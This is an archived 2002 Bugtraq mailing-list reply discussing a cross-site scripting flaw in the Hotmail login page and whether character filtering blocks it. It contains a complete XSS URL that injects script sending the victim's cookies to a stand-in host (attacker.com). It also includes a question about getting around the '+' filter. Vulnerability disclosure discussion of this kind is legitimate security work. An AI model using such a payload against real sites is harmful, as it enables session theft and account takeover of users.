[27351] in bugtraq
RE: XSS bug in hotmail login page
daemon@ATHENA.MIT.EDU (Russell Harding)
Tue Oct 8 18:39:47 2002
Date: Mon, 7 Oct 2002 23:50:38 -0700 (MST)
From: Russell Harding <hardingr@cunap.com>
To: Thor Larholm <Thor@jubii.dk>
In-Reply-To: <52D05AEFB0D95C4BAD179A054A54CDEB03470DED@mailsrv1.jubii.dk>
Message-ID: <Pine.LNX.4.33.0210072341010.20064-100000@phantomphlux.dhs.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hello, comments below:
On Mon, 7 Oct 2002, Thor Larholm wrote:
> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.
>
I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
from GET requests. While you can view your own cookies easily, I'm not
sure if you can still exploit this bug. I do know filtering these
characters prevents this sort of attack:
http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb="><script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>&ct=1033054530&_setlang=
Is there another way to exploit this which I am not seeing? Or does MSN
actually have their act together (in this particular case...)?
-Russell
P.S. Well, I suppose the real question may be this:
Is there a way to concatenate javascript strings without "+" or "%2B"?
On Mon, 7 Oct 2002, Thor Larholm wrote:
> > From: Peter Rdam [mailto:hell@weedmail.com]
> > They didnt reacted, and im pretty curious about what
> > is possible with the bug. And i actually hope that
> > someone can tell me about it and maybe Microsoft will
> > do something about it..
>
> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.
>
>
>
> Regards
> Thor Larholm
> Jubii A/S - Internet Programmer
>
